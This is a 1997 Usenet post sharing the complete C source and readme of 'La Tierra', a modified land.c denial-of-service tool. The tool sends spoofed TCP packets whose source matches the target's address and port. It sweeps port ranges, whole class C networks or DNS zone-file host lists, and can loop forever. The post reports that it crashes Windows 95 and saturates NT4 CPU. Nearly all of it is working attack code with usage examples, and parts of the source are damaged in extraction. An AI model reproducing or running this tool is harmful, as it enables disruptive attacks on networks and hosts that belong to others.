From: Subject: DoS attack on NT4-SP3 and 95 [highly effective] Date: Wed, 26 Nov 1997 15:33:55 -0600 Message-ID: <> Newsgroups: Organization: Deja News Posting Service Path:!!philabs!!!!!!!!Sprint!!!!!not-for-mail X-Article-Creation-Date: Wed Nov 26 21:19:43 1997 GMT X-Authenticated-Sender: X-Http-User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95; TUCOWS USER) X-Originating-IP-Addr: ( Lines: 941 latierra.c Obtained this from, and it appears to do a very good job at pegging the CPU (%100) on NT4-SP3. Windows 95 simply crashes. Has anyone had a chance to work with this yet and had the same results I had? ---- here's the source to latierra.c developed by MondoMan ----------- /**************************************************************/ /* */ /* La Tierra v1.0b - by MondoMan (KeG), */ /* */ /* Modified version of land.c by m3lt, FLC */ /* */ /* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */ /* gcc version tabs set to 3 */ /* */ /* gcc latierra.c -o latierra */ /* */ /* Refer to readme.txt for more details and history */ /* */ /**************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #define DEFAULT_FREQUENCY 1 #define TRUE 1 #define FALSE 0 #define FOR_EVER -5 #define LIST_FILE 1 #define ZONE_FILE 2 #define MAXLINELENGTH 512 #define DEFAULT_SEQ 0xF1C #define DEFAULT_TTL 0xFF #define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH) #define DEFAULT_WINSIZE 0xFDE8 struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; typedef struct latierra_data { char dest_ip[256]; int tcp_flags; int window_size; int ip_protocol; int sequence_number; int ttl; int supress_output; int message_type; } LATIERRA_DATA; void alternatives(void); int get_ip(int use_file, FILE *fp, char *buff); int land(LATIERRA_DATA *ld, int port_number); void nslookup_help(void); void print_arguments(void); void protocol_list(void); /********/ /* main */ /********/ int main(int argc, char **argv) { FILE *fp; LATIERRA_DATA ld; int frequency = DEFAULT_FREQUENCY, x; int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE; int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE; char got_ip = FALSE, got_beg_port = FALSE; char class_c_addr[21], filename[256], buff[512], valid_tcp_flags [16]; printf("\nlatierra v1.0b by MondoMan (, KeG\n"); printf("Enhanced version of land.c originally developed by m3lt, FLC\n"); strcpy(valid_tcp_flags, "fsrpau"); ld.tcp_flags = 0; ld.window_size = DEFAULT_WINSIZE; ld.ip_protocol = IP_TCP; ld.sequence_number = DEFAULT_SEQ; ld.ttl = DEFAULT_TTL; ld.message_type = 0; if(argc > 1 && (!strcmp(argv[1], "-a"))) alternatives(); if(argc > 1 && (!strcmp(argv[1], "-n"))) nslookup_help(); if(argc > 1 && (!strcmp(argv[1], "-p"))) protocol_list(); if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h")))) print_arguments(); while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF) { switch(i) { case 't': for(x=0;x 1) strcpy(ld.dest_ip, optarg); else { printf("ERROR: Must specify valid IP or hostname.\n"); return(-6); } got_ip = TRUE; break; case 's': frequency = atoi(optarg); break; case 'l': loop = atoi(optarg); break; case 'b': beginning_port = atoi(optarg); got_beg_port = TRUE; break; case 'e': ending_port = atoi(optarg); break; } } if(!ld.tcp_flags) ld.tcp_flags = DEFAULT_TCPFLAGS; if(!got_beg_port) { fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n"); return(-7); } if(ending_port == 0) ending_port = beginning_port; printf("\nSettings:\n\n"); printf(" (-i) Dest. IP Addr : "); if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-') { ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0; strcpy(class_c_addr, ld.dest_ip); strcat(ld.dest_ip, "1"); printf(" %s (Class C range specified).\n", ld.dest_ip); increment_addr = TRUE; octet = 1; } else if(strlen(ld.dest_ip) > 5) { if(strncmp(ld.dest_ip, "zone=", 5)==0) { strcpy(filename, &ld.dest_ip[5]); printf("%s (using DNS zone file)\n", filename); use_file = ZONE_FILE; } else if(strncmp(ld.dest_ip, "list=", 5) == 0) { strcpy(filename, &ld.dest_ip[5]); printf("%s (using ASCII list)\n", filename); use_file = LIST_FILE; } else printf("%s\n", ld.dest_ip); } else { printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip); return(-9); } printf(" (-b) Beginning Port #: %d\n", beginning_port ); printf(" (-e) Ending Port # : %d\n", ending_port ); printf(" (-s) Seconds to Pause: %d\n", frequency ); printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " ); printf(" (-w) Window size : %d\n", ld.window_size ); printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number ); printf(" (-v) Time-to-Live : %d\n", ld.ttl); printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol ); printf(" (-t) TCP flags : "); strcpy(buff, ""); if( ld.tcp_flags & TH_FIN) strcat(buff, "fin "); if( ld.tcp_flags & TH_SYN) strcat(buff, "syn "); if(ld.tcp_flags & TH_RST) strcat(buff, "rst "); if(ld.tcp_flags & TH_PUSH) strcat(buff, "push "); if(ld.tcp_flags & TH_ACK) strcat(buff, "ack "); if(ld.tcp_flags & TH_URG) strcat(buff, "urg "); printf("%s\n\n", buff); if(ending_port < beginning_port) { printf("\nERROR: Ending port # must be greater than beginning port #\n\n"); return(-8); } scan_loop = loop_val = loop; if(use_file) { if(access(filename, 0)) { printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename); return(-9); } if( (fp = fopen(filename, "rt")) == NULL) { printf("ERROR: Unable to open %s.\n", filename); return(-10); } if(!get_ip(use_file, fp, buff)) { printf("Unable to get any IP address from file %s. \n"); return(-11); } strcpy(ld.dest_ip, buff); } while( (loop == FOR_EVER) ? 1 : loop-- > 0) { for(i=beginning_port; i <= ending_port; i++) { if(land(&ld, i)) /* go for it BaBy! */ break; if(frequency) /* make sure freq > 0 */ { if(!ld.supress_output) printf("-> paused %d seconds.\n", frequency); sleep(frequency); } } if( (!use_file) && (loop && increment_addr) ) { char temp_addr[21]; if(++octet > 254) /* check for reset */ { if(loop_val != FOR_EVER) /* make sure not to distrute forever! */ { if(++scan_loop > loop_val) /* check if scanned x times */ break; else loop = loop_val; /* restore original value */ } octet = 1; /* reset */ } sprintf(temp_addr, "%s%d", class_c_addr, octet); strcpy(ld.dest_ip, temp_addr); if(!ld.supress_output) printf("** incrementing to next IP address: %s\n", ld.dest_ip); if(scan_loop > loop_val) break; /* break while loop */ } else if(use_file) { if(!get_ip(use_file, fp, buff)) break; loop++; strcpy(ld.dest_ip, buff); } } /* end while */ printf("\nDone.\n\n"); } /* end main */ int get_ip(int use_file, FILE *fp, char *buff) { if(use_file == LIST_FILE) return(get_ip_from_list(fp, buff)); return(get_ip_from_zone(fp, buff)); } int get_ip_from_list(FILE *fp, char *buff) { int ret_val; while(1) { ret_val = (int)fgets(buff, MAXLINELENGTH, fp); if((ret_val == EOF) || (ret_val == (int)NULL)) return 0; if( strlen(buff) >= 7) if((buff[0] != ';') && (buff[0] != '[')) { if( (buff[strlen(buff)-1] == '\r') || (buff [strlen(buff)-1] == '\n') ) buff[strlen(buff)-1] = 0x0; return 1; } } return 0; } int get_ip_from_zone(FILE *fp, char *buff) { int ret_val, i; char *p, delim[8]; strcpy(delim, " \t"); while(1) { ret_val = (int)fgets(buff, MAXLINELENGTH, fp); if((ret_val == EOF) || (ret_val == (int)NULL)) return 0; if( strlen(buff) >= 7) if((buff[0] != ';') && (buff[0] != '[') && (strncmp (buff, "ls -d", 5) != 0)) { if( (p = strtok( buff, delim)) == NULL) continue; if( (p = strtok(NULL, delim)) == NULL) continue; if(strcmp(p, "A")) /* be sure second column is an DNS A record */ continue; if( (p = strtok(NULL, delim)) == NULL) continue; strcpy(buff, p); /* verify that we have a valid IP address to work with */ if(inet_addr(p) == -1) continue; /* strip off training line characters */ if( (buff[strlen(buff)-1] == '\r') || (buff [strlen(buff)-1] == '\n') ) buff[strlen(buff)-1] = 0x0; return 1; } } return 0; } /************/ /* checksum */ /************/ u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i = 0; i< (length >> 1); i++) value += data[i]; if((length & 1)==1) value += (data[i] << 8); value = (value & 0xFFFF) + (value >> 16); return(~value); } /********/ /* land */ /********/ int land(LATIERRA_DATA *ld, int port_number) { struct sockaddr_in sin; int sock; char buffer[40]; struct iphdr * ipheader = (struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1) { printf("ERROR: unknown host %s\n", ld->dest_ip); return(-1); } if((sin.sin_port=htons(port_number))==0) { printf("ERROR: unknown port %s\n",port_number); return(-2); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { printf("ERROR: couldn't allocate raw socket\n"); return(-3); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(ld->sequence_number); ipheader->ttl = ld->ttl; ipheader->protocol = ld->ip_protocol; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport = sin.sin_port; tcpheader->th_dport = sin.sin_port; tcpheader->th_seq = htonl(ld->sequence_number); tcpheader->th_flags = ld->tcp_flags; tcpheader->th_off = sizeof(struct tcphdr)/4; tcpheader->th_win = htons(ld->window_size); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol = ld->ip_protocol; pseudoheader.length = htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if( sendto(sock, buffer, sizeof(struct iphdr) +sizeof(struct tcphdr), ld->message_type, (struct sockaddr *) &sin, sizeof(struct sockaddr_in) )==-1) { printf("ERROR: can't send packet. (sendto failed)\n"); return(-4); } if(!ld->supress_output) printf("-> packet successfully sent to: %s:%d\n", ld- >dest_ip, port_number); close(sock); return(0); } /* End of land */ void alternatives() { printf("\nAlternative command line arguments for option -i\n\n"); printf(" You can create two types of files that latierra can use to get\n"); printf(" a list of IP addresses, a simple ASCII file with each IP address\n"); printf(" appearing on each line or better yet, a DNS zone file created by\n"); printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n"); printf(" command line of latierra.\n\n"); printf(" Basically, latierra will walk down the list and send the spoofed packet\n"); printf(" to each IP address. Once the list is complete, and loop > 1, the list\n"); printf(" is repeated. To specify that the '-i' option should use a zone file,\n"); printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n"); printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n"); printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n"); printf(" record (second column)in a zone file will ignored. \n\n"); exit(-1); } void nslookup_help() { printf("\nNSLOOKUP help\n\n"); printf("To see who is the DNS server for a particular domain, issue the following:\n"); printf(" > set type=ns\n"); printf(" >\n\n"); printf(" You will see a list of the name server(s) if completed successfully\n\n"); printf("To get a list of all the DNS entries for a particular domain, run nslookup\n"); printf("and issue the following commands:\n"); printf(" > server\n"); printf(" > ls -d > filename.txt\n\n"); printf("Line 1 sets the server that nslookup will use to resolve a name.\n"); printf("Line 2 requires all the information about be written to filename.txt\n\n"); exit(-1); } void protocol_list() { printf("\nProtocol List:\n\n"); printf("Verified:\n"); printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9- IGP 10-BBN_RCC_MON\n"); printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17- UDP 18-MUX\n"); printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24- TRUNK2\n"); printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30- NETBLT\n"); printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64- SAT_EXPAK\n"); printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71- IPCV\n"); printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80- ISO_IP\n"); printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85- NSFNET_IGP 86-DGP\n"); printf("87-TCF 88-IGRP 89-OSPFIGP 90- SPRITE_RPG 91-LARP\n\n"); printf("Supported:\n"); printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n"); exit(-1); } void print_arguments() { printf("Arguments: \n"); printf(" * -i dest_ip = destination ip address such as \n"); printf(" If last octet is '-', then the address will increment\n"); printf(" from 1 to 254 (Class C) on the next loop\n"); printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER); printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n"); printf(" For list of alternative options, use -a instead of -h.\n"); printf(" * -b port# = beginning port number (required).\n"); printf(" -e port# = ending port number (optional)\n"); printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n"); printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL); printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n"); printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE); printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ); printf(" -m message_type (~0=none,1=Out-Of- Band,4=Msg_DontRoute\n"); printf(" -s seconds = delay between port numbers, default=% d\n", DEFAULT_FREQUENCY); printf(" -o 1 = supress additional output to screen, default=0\n" ); printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER); printf(" * = required ~ = default parameter values\n\n"); exit(-1); } /* End of file */ ----------------- readme.txt ------------------------------ La Tierra v1.0b - by MondoMan (KeG), Modified version of land.c by m3lt, FLC To compile latierra, type: gcc latierra.c -o latierra To see the help screen, use 'latierra -h' This program crashes Windows 95, and will cause Windows NT 4.0, SP3 to utilize a high percentage of CPU. In some instances, CPU usage reaches %100. land.c description: land.c sends a spoofed packet with the SYN flag from the the same IP and port number as the destination. For example, if you want to do a DoS on, port 80, it would spoof port 80 as the source. The problem is with NT4 SP3, however, is once you issue this packet to a port, NT4 SP3 appears to ignore all other attempts - UNTIL ... La Tierra! La Tierra description: La Tierra basically works by sending NT the same packet used in land.c but to more than one port (if specified). It doesn't appear to matter if the port is opened or closed! NT doesn't appear to let this happen again on the same port successively, but you simply change ports, and you can easily go back to the original port and it'll work again. What's even more interesting is the fact that port 139 works with this. You would have thought - I'll leave that alone for now! While testing, I used a Compaq dual Intel Pentium Pro 200, and was able to take up to %64 CPU. With one processor disabled, CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs time to recover, even with one spoofed packet. Features include: - Ability to launch a DoS on an entire class C address - Specify the beginning and ending port range - Specify the number of loops or make it loop forever! - User defined TCP flags: fin, syn, reset, push, ack, and urgent - Other IP options such as window size, time-to-live, sequence_number, and message_type - Ability to read a DNS zone file for IP addresses - Ability to read a ASCII file containing IP addresses Command line options: - i ip_address DEFAULT: None RANGE: Valid IP Address OPTIONAL: No where ip_address is a valid ip_address, or if you wish to cycle through a class C address, the last octet is dropped and replaced with a '-'. This option is required. The source and destination address are obtained from this value. Rather than specifying an IP address, you may wish to create an ASCII file, or better yet, use nslookup to obtain all zone information for a particular domain. The ASCII file simply contains a list of IP addresses, one on each line. To get a DNS file, simply use nslookup, and the "ls -d > filename.txt" command. You can use 'latierra -n' to read more about the command sequence for nslookup. In both types of files, lines that begin with ';' or '[' are ignored. In DNS files, only 'A' records are processed. Examples: Single IP Address: -i Class C range: -i 10.1.2.- ASCII file: -i list=filename.txt DNS file: -i zone=filename.txt -b beginning_port_number DEFAULT: None RANGE: Positive Integer OPTIONAL: No where this value is the port_number that latierra will use. If no ending_port_number is specified, ending_port_number is then equal to this value. Valid range is 1 to 0xFFFF -e ending_port_number DEFAULT: If not specified, equal to beginning_port_number RANGE: Positive Integer OPTIONAL: Yes is the highest port number in the range to cycle through. Example: -i -b 23 -e 80 will start at port 23 and increment up to port 80. You can delay the next increment by using the -s option. Valid range is 1 to 0xFFFF -s seconds_between_spoofs DEFAULT: 1 RANGE: Positive Integer OPTIONAL: Yes You may want to control the seconds between spoofs. If you specify a zero, no delays occur. In the below example, the spoof will between ports 23 and 80, every 3 seconds. -i -b 23 -e 80 -s 3 -l number_of_loops DEFAULT: 1 RANGE: Positive Integer, -5 loops forever OPTIONAL: Yes This option if set greater than 1, will cause a repeat of the cycle. For example: -i -b 23 -e 80 -s 0 -l 8 will cause latierra to go through ports 23 through 80 and repeat the process 8 times, with no delay. Look at the following example: -i 10.1.2.- -b 23 -e 80 -s 0 -l 8 latierra will start at, port 23 through 80, then increment to, port 23 through 80, and so on until it gets to, in which case it will repeat the same procedure over again 8 times. By specifying a value of -5 for this option, latierra will loop forever, until you manually stop the process. In the last example above, the procedure would never end. When it reaches, it falls back to and start over again from there. Other examples: -i -b 139 -s 0 -l -5 -i 10.1.2.- -b 80 -s 5 -l 10 -t tcp_flags DEFAULT: sp (SYN, PUSH) RANGE: valid character set (see below) OPTIONAL: Yes this option sets the various TCP flags, which include: f = fin s = syn r = reset p = push a = ack u = urgent Example: -i -b 139 -t apu -s 0 To set the ack, push, and urgent flag -v time_to_live_value DEFAULT: 0xFF (255 decimal) RANGE: Positive Integer OPTIONAL: Yes Sets the time to live value. -p protocol_value DEFAULT: 6 (tcp) RANGE: Positive Integer OPTIONAL: Yes Sets the protocol value in the IP header. To see a list of available protocols, run "latierra -p". -w window_size_value DEFAULT: 0xFFFF (65000 decimal) RANGE: Positive long value OPTIONAL: Yes -q tcp_sequence_number_value DEFAULT: 0xF1C RANGE: Positive integer OPTIONAL: Yes -o 1 supress_additional_output DEFAULT: messages are printed for status RANGE: None OPTIONAL: Yes If you don't want to see the messages during the process, simply use this "-o 1" to turn them off. Final Note: Please use this program for in-house testing purposes only. Just because your sending spoofed packets, doesn't mean you can't be traced. Good luck. - MondoMan -------------------- end of file ------------------------------- -------------------==== Posted via Deja News ====----------------------- Search, Read, Post to Usenet